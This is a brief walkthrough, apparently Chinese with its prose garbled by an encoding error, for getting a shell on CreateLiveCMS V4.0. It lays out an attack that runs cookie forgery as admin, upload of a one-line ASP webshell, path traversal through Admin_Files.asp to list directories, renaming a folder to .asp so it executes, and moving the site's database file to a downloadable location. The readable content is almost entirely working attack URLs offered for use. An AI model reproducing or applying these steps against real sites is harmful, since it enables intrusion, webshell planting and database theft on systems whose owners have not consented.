CreateLiveCMSV4.0 ©̨Get shell

עû¼

޸cookie:UserGroupID=1&Password=798fb0743e519ec0&UserName=admin&UserID=1


cookie

http://XXX.XXX.XXX.XXX/dlugis/user/upload.asp?action=F&id=3&type=0

idֵı.

ϴһcopyASPһ仰

鿴ļĿ¼

http://xxx.xxx.xxx.xxx/dlugis/Admin/Admin_Files.asp?action=Main&FileType=select&ChannelID=2&ThisDir=../Photo/2012-3

ļ

http://XXX.XXX.XXX.XXX/dlugis/Admin/Admin_Files.asp?action=Rname&FileType=select&ChannelID=3&FolderId=2012-3&NewName=ok.asp


³ɹû

˵

http://XXX.XXX.XXX.XXX/dlugis/Admin/Admin_Files.asp?action=Rname&FileType=select&ChannelID=3&FileId=../../Data/%23Cl_Count.mdb&NewName=ok

ѱĿ¼ݿļƵǰĿ¼ļΪok.mdb

http://XXX.XXX.XXX.XXX/dlugis/Admin/Admin_Files.asp?action=Main&FileType=select&ChannelID=2&ThisDir=../../../

Ŀ¼

